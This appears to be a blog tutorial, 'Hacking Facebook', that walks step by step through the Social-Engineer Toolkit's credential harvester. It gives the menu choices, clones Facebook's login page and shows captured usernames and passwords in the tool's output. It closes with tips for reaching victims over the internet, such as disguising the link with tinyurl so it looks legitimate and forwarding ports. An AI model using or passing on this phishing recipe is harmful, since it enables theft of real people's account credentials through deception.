Hacking Facebook
Social Engineering Toolkit
Humans are the weakest link in any security system ~Shashwat (That'll be me)If you have read the previous post, then you know what I'm talking about. Social engineering toolkit does not exploit vulnerability in the mechanism of any service. It exploits the weakness in the human element of security. Some official words from the official guys before we move on to the actual hacking
The
Social-Engineer Toolkit (SET) was created and written by the founder of
TrustedSec. It is an open-source Python-driven tool aimed at
penetration testing around Social-Engineering. SET has been presented at
large-scale conferences including Blackhat, DerbyCon, Defcon, and
ShmooCon. With over two million downloads, SET is the standard for
social-engineering penetration tests and supported heavily within the
security community.
Kali Linux
I don't
feel the need to mention it, but I'll still do it. You need Kali Linux
to proceed with this tutorial. Check out the top of the page and see the
"Kali Linux complete" tutorial.
Se-toolkit
Start Kali Linux. In a console/terminal type se-toolkit.
Something like this will show up
root@kali:~# se-toolkit
[-] New set_config.py file generated on: 2014-05-26 08:26:33.526119
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2014-05-26 08:26:33.526119
[*] SET is using the new config, no need to restart
_______________________________
/ _____/\_ _____/\__ ___/
\_____ \ | __)_ | |
/ \ | \ | |
/_______ //_______ / |____|
\/ \/
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set>
Now type the following and press enter.
1 [enter] 2 [enter] 3 [enter]
1 [enter] 2 [enter] 3 [enter]
Explanation
- 1 selects social engineering attacks. Obvious choice if you read the other options from 1 to 9 (and 99 for exit)
- The 2 selects Website Attack Vectors. Not that obvious. The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
- Then, the 3 selects Credential Harvestor. The Credential Harvester method will utilize web cloning of a web-site that has a username and password field and harvest all the information posted to the website.
Now you'll be seeing something like this-
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
Type 2 to select site cloner.
Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/
Now
in your browser on Kali Linux, enter your IP. It will display facebook
login page. Enter any info and press login. You will get the information
in se-toolkit. If you are using VMWare or virtualbox, then you can try
and enter the IP on the browsers there. It will work.
Entering
the IP in browser shows you the fake login page. Also, se-toolkit
registers the visit and says 192.168.154.133 - - [27/May/2014 02:32:32]
"GET / HTTP/1.1" 200 -
To
make the technique work over internet, you will need to use your public
IP instead of private. Search google for what is my IP to find you
public IP. Then use it. You can use tinyurl or something to make the url
appear legitimate. Also, port forwarding might need to be enabled, as
your router might block traffic on port 80. Firewall can also cause
troubles. While this tutorial was nothing more than - se-toolkit 1 2 3
[your IP] [facebook.com], the next post on getting your credential
harvestor on the internet will make the tutorial complete and useful in
practical sense.
Find your IP
On a new terminal type ifconfig. This will give you your ipv4 address, which is what you are looking for
Back to se-toolkit
Now it'll ask you to specify the IP to which the data is supposed to be sent to. That'll be your IP address. Since this is your internal IP address (i.e. local IP), the fake facebook page will work only for computers connected with your LAN.Now it'll ask for the page to be cloned. Enter https://www.facebook.com/.
set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.154.133
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://www.facebook.com/
Live demonstration
To
make sure that the demonstration is not just a repetition of what you
already know, I have decided to clone the login page of facebook,
instead of homepage. It will be a tad bit different. Here is a
screenshot of what I did.
The
IP address is my internal address from ifconfig, which comes out to be
192.168.154.133. The cloned page is https://www.facebook.com/login.php.
Now we will try to see if this credential harvestor works.
On the Kali Linux Machine itself
Now if we enter something in the field,
it also shows up on se-toolkit. I entered 'hackingwithkalilinux' in
username field and 'password' in password field. This is what se-toolkit
shows-
POSSIBLE USERNAME FIELD FOUND: email=hackingwithkalilinux
POSSIBLE PASSWORD FIELD FOUND: pass=password
Also note that se-toolkit might keeping dumping more stuff in the console, most of which is not important for the time being.
On Windows 8 machine (host)
Now
I'm running Kali on a virtual machine. Windows 8 is the host machine,
and we might want to check if it works on Windows 8. Also, we would also
like to see if modern browsers are able to observe anything wrong with
the page, and if the firewall stops the data flow.
I
entered windows8host and password2 and pressed the login button. This
is what I got. Also, as I was logged in to Facebook with my personal
account, the fake page redirected me to facebook.
POSSIBLE USERNAME FIELD FOUND: email=windows8host
POSSIBLE PASSWORD FIELD FOUND: pass=password2
Conclusion : This method pretty much works well over LAN.